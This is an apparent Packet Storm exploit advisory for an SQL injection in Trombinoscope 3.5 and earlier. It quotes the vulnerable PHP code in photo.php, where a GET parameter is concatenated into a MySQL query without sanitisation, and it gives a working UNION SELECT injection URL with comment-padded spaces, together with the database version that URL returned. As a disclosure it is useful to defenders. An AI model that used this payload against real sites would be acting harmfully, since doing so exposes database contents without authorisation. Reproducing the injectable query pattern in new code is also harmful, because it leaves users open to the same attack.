Trombinoscope versions 3.5 and below suffer from a remote SQL injection vulnerability.
35520837705b4781429f47c3e17d1f0dfb67f61bfd7850f5184538c3821344a1<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~>
Exploit Title: Trombinoscope <= 3.5 SQL Injection Vulnerability
Date: 03 Mei 2012
Author: Ramdan Yantu
Home: http://ramdanyantu.com/
Software Link:
http://ftp1.toocharger.com/sc2MP3p/trombinoscope_4116.zip
<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~>
Bugs <photo.php>:
[...]
25 <?php
26 $id = $_GET["id"];
27
28 $query_seul = "SELECT `pseudo`, `sexe`, `img` FROM `trombino` WHERE idx = $id";
29 $seul = mysql_query($query_seul) or die(mysql_error());
30 $row_seul = mysql_fetch_assoc($seul);
31
32 ?>
[...]
Exploit: http://localhost/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--
Result : 5.0.51b-community-nt-log
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed